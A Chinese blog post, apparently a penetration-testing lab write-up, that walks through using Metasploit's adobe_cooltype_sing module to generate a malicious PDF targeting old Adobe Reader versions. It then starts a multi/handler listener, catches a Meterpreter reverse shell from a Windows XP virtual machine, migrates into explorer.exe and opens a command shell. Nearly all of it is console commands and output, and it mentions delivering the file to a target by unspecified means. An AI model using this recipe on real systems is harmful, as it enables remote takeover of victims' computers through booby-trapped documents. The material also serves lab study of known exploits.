使用Metasploit生成PDF文件对目标进行渗透测试

最新推荐文章于 2022-11-27 18:42:36 发布
最新推荐文章于 2022-11-27 18:42:36 发布
阅读量974 收藏 7
点赞数 5
分类专栏: 精通Metasploit学习笔记 文章标签: metasploit kali linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/116741228
版权

文章目录

前言

使用PDF文件对目标进行渗透测试

一、漏洞介绍

测试案例描述
漏洞Smart Independent Glyplets (SING)表中的uniquename存在着栈溢出漏洞
影响到的版本windows、macintosh和unix的Adobe Reader 9.3.4 / Acrobat 9.3.4及更早版本

二、渗透步骤

1.生成恶意pdf文件

msf6 > use exploit/windows/fileformat/adobe_cooltype_sing 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > options

Module options (exploit/windows/fileformat/adobe_cooltype_sing):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.pdf          yes       The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/fileformat/adobe_cooltype_sing) > exploit

[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf

可以看到恶意pdf文件已经生成在/root/.msf4/local/msf.pdf,现在就可以通过一些特殊手段发送给目标主机

2.启动主控端handler

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1878) at 2021-05-13 11:08:03 +0800

meterpreter >

可以看到,生的恶意文件已经在目标主机上运行(本机),接下来,可以进行一些基本操作

将权限迁移到另一个更安全的进程上

meterpreter > getpid
Current pid: 1144
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System             x86   0        NT AUTHORITY\SYSTEM
 248   736   VGAuthService.exe  x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 448   736   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 544   4     smss.exe           x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 612   544   csrss.exe          x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 692   544   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 736   692   services.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 748   692   lsass.exe          x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 916   736   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 932   736   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 1000  736   svchost.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1144  736   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1276  736   svchost.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1324  736   svchost.exe        x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1384  932   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1516  736   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1524  1760  rundll32.exe       x86   0        WINXP-1\st21                  C:\WINDOWS\system32\rundll32.exe
 1532  1144  wscntfy.exe        x86   0        WINXP-1\st21                  C:\WINDOWS\system32\wscntfy.exe
 1544  736   spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1608  1760  vmtoolsd.exe       x86   0        WINXP-1\st21                  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1704  1760  ctfmon.exe         x86   0        WINXP-1\st21                  C:\WINDOWS\system32\ctfmon.exe
 1760  1732  explorer.exe       x86   0        WINXP-1\st21                  C:\WINDOWS\Explorer.EXE
 1924  736   svchost.exe        x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1932  736   alg.exe            x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 2060  1760  cmd.exe            x86   0        WINXP-1\st21                  C:\WINDOWS\system32\cmd.exe
 2116  1760  IEXPLORE.EXE       x86   0        WINXP-1\st21                  C:\Program Files\Internet Explorer\iexplore.exe
 2476  736   metsvc.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\TEMP\MWPrEozxdnwJwU\metsvc.exe
 3368  3348  phpStudy.exe       x86   0        WINXP-1\st21                  C:\phpStudy\phpStudy.exe
 3424  3368  httpd.exe          x86   0        WINXP-1\st21                  C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
 3432  3368  mysqld.exe         x86   0        WINXP-1\st21                  C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe
 3440  3400  conime.exe         x86   0        WINXP-1\st21                  C:\WINDOWS\system32\conime.exe
 3568  3424  httpd.exe          x86   0        WINXP-1\st21                  C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe

meterpreter > migrate 1760
[*] Migrating from 1144 to 1760...
[*] Migration completed successfully.

列出目标主机的网络信息

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:95:e3:e1
MTU          : 1500
IPv4 Address : 192.168.1.115
IPv4 Netmask : 255.255.255.0


Interface 65540
============
Name         : Bluetooth `�
Hardware MAC : 94:b8:6d:d2:53:f2
MTU          : 1500

进入shell

meterpreter > shell
Process 1452 created.
Channel 1 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.

C:\Documents and Settings\st21>ls
ls
'ls' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

C:\Documents and Settings\st21>dir
dir
 ������ C �еľ�û�б�ǩ��
 ��������� 5436-1D2F

 C:\Documents and Settings\st21 ��Ŀ¼

2021-04-14  10:42    <DIR>          .
2021-04-14  10:42    <DIR>          ..
2021-03-23  21:19    <DIR>          Favorites
2021-03-23  21:19    <DIR>          My Documents
2021-03-23  21:07    <DIR>          ����ʼ���˵�
2021-04-26  13:19    <DIR>          ����
               0 ���ļ�              0 ��
               6 ��Ŀ¼ 38,396,850,176 ������

C:\Documents and Settings\st21>

总结

本文简单介绍了使用metasploit生成恶意PDF文件对目标主渗透测试,仅供学习使用

我重来不说话
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用metasploit制作pdf木马
爱我非你莫属的博客
10-04 1924
实验环境:kali-linux虚拟机(攻击机)、win7虚拟机(靶机) 实验工具:Vmware、kali-linux的iso 实验过程: 一、攻击机端: 1.查看自己的ip地址:ifconfig 2.进入metasploit控制台:msfconsole #> msfconsole 3.利用PDF文件漏洞(Adobe公司之前发布的一个漏洞): #> use exploit/windows/fileformat/adobe_cooltype_sing 4.配置攻击载荷创建到攻击机的.
Metasploit 渗透测试.pdf
07-23
Metasploit 渗透测试渗透测试实验环境,情报搜集技术,渗透攻击案例
web安全渗透之钓鱼网站提权
kali_Ma的博客
11-12 4396
生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。
[电子书]渗透测试框架Metasploit基础(中文版PDF
chuancuili8770的博客
07-25 750
来源:Gall @ 周边@freebuf 整理此文档,纯粹出于兴趣爱好,如果有涉及版权的问题,请联系原文档的作者。由于本人能力有限,文档中难免会有些错误,欢迎大家指正。 内容: Metasploit基础知识 msfcli msfconsole ...
利用Metasploit制作PDF木马
#7的博客
11-06 6523
实验环境:kali-linux虚拟机(攻击机)、win7虚拟机(靶机) 实验工具:Vmware、kali-linux的iso 之前做了一个视频发现无法上传,此处就发一些过程截图吧。 实验过程: 一、攻击机端: 1.查看自己的ip地址:ifconfig 2.进入metasploit控制台:msfconsole 3.利用PDF文件漏洞(Adobe公司之前发布的一个漏洞):use ...
永恒之蓝复现
最新发布
m0_64180167的博客
11-27 1312
永恒之蓝复现
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
Metasploit 安装方法.pdf
05-19
Metasploit 框架的安装完成后,您可以使用它来进行渗透测试和漏洞扫描。Metasploit 框架提供了大量的模块和插件,能够帮助您自动化攻击和渗透测试过程。 Metasploit 框架的优点包括: * 高度自动化的攻击和渗透...
metasploit中文使用详解.pdf
08-14
4. **测试与调试**:对开发的新模块进行测试,确保其能够正常工作。 #### 七、安全软件常用检测方法 安全软件通常采用以下几种方法来检测Metasploit等工具的活动: 1. **特征匹配**:通过分析已知恶意软件的行为...
Metasploit渗透测试指南.pdf
12-10
英文版:Metasploit: The Penetration Tester's Guide 内容简介 《Metasploit渗透测试指南》介绍Metasploit——近年来最强大、最流行和最有发展前途的开源渗透测试平台软件,以及基于Metasploit进行网络渗透测试与安全漏洞研究分析的技术、流程和方法。 《Metasploit渗透测试指南》共有17章,覆盖了渗透测试的情报搜集、威胁建模、漏洞分析、渗透攻击和后渗透攻击各个环节,并包含了免杀技术、客户端渗透攻击、社会工程学、自动化渗透测试、无线网络攻击等高级技术专题,以及如何扩展Metasploit情报搜集、渗透攻击与后渗透攻击功能的实践方法,《Metasploit渗透测试指南》一步一个台阶地帮助初学者从零开始建立起作为渗透测试者的基本技能,也为职业的渗透测试工程师提供一本参考用书。《Metasploit渗透测试指南》获得了Metasploit开发团队的一致好评,Metasploit项目创始人HD Moore评价《Metasploit渗透测试指南》为:“现今最好的Metasploit框架软件参考指南”。 《Metasploit渗透测试指南》适合网络与系统安全领域的技术爱好者与学生,以及渗透测试与漏洞分析研究方面的安全从业人员阅读。
Metasploit渗透测试指南完整版-pdf
07-23
本电子书讲带你打开一扇新的大门,让你掌握神器msf的使用!!!!! Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具。然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
Metasploit 中文手册.pdf
06-27
Metasploit软件帮助安全专家和 IT 专家识别安全问题、验证漏洞修复情况,并管理由专家执行的安全评估。 该产品提供真正的安全风险智能,帮助用户保护数据抵御攻击。 本 POC 指南的内容涉及智能入侵测定、密码审计、web 应用程序扫描和社会工程。Metasploit 帮助团队进行协作,并在整合的报告中显示其发现结果。
2022最新Web渗透面试大全.pdf
11-20
Web渗透测试是网络安全领域的重要部分,它涉及到对网站和应用程序的深入分析,寻找潜在的安全漏洞。这份2022最新Web渗透面试大全涵盖了多个关键知识点,包括工具使用、信息收集、漏洞扫描、权限提升和安全策略。 ...
渗透测试-pdf文件上传-XSS
热门推荐
cdyunaq的博客
01-06 1万+
前言 pdf是portable document format的缩写,是目前广泛应用于各种场合的文件格式,其是由Adobe公司根据Postscript语言修改后提出的文件标准,并且被ISO组织接受,目前已经发展到2.0版本(ISO32000-2)。 目前广泛使用的是1.7版本,该版本pdf功能已经相当丰富,可以显示3D模型,播放多媒体音视频,执行Javascript脚本等功能。 PDF中的JavaScript利用 Pdf文件是应用广泛的一种文件格式,很多针对Adobe阅读器的CVE漏洞都是通过pdf
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6303
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
ms08-067漏洞的复现及所遇到的问题分析
ianTok
10-12 4728
ms08-067
永恒之蓝 (Ms17-010)漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-21 2570
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
客户端渗透之——基于PDF文件格式的渗透攻击
冰河的专栏
01-24 2637
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633022 攻击机 Kali 192.168.175.128 靶机 WinXP 192.168.175.130 漏洞程序: Adobe Reader 9.0 1.生成PDF文件 msfconsole use exploit/windows/fileformat/ad...
Metasploit渗透测试实战指南
自动化渗透测试章节介绍了如何使用Metasploit与其他工具集成,提高测试效率。最后,无线网络攻击部分则涵盖了无线网络的安全评估方法。 本书不仅适合网络安全领域的初学者,也对职业渗透测试工程师具有很高的参考...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值